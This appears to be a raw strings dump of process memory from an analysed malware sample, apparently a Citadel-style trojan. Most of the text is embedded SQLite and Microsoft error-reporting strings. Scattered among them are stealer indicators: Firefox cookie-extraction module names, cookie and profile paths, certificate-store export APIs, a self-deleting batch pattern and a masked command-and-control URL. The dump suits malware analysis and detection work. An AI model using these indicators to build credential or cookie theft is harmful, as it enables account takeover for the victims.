SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
|%Documents and Settings%\%current user%\Application Data\crys.exe
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

crys.exe_1460_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

DW20.EXE_1296_rwx_00AB0000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

DW20.EXE_1296_rwx_015A0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
zcÁ
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
GetCPInfo
]<%XkG
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
888816666554443
6666554443
!6666554443
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

DW20.EXE_2176:

.text
`.data
.cdata
.rsrc
watson.microsoft.com
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Not offering reporting
%s Mode
Failed to get a reporting destination
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
No reports for given queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
Launching lightweight browser with URL
mshtml.dll
Not reporting
Reporting
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
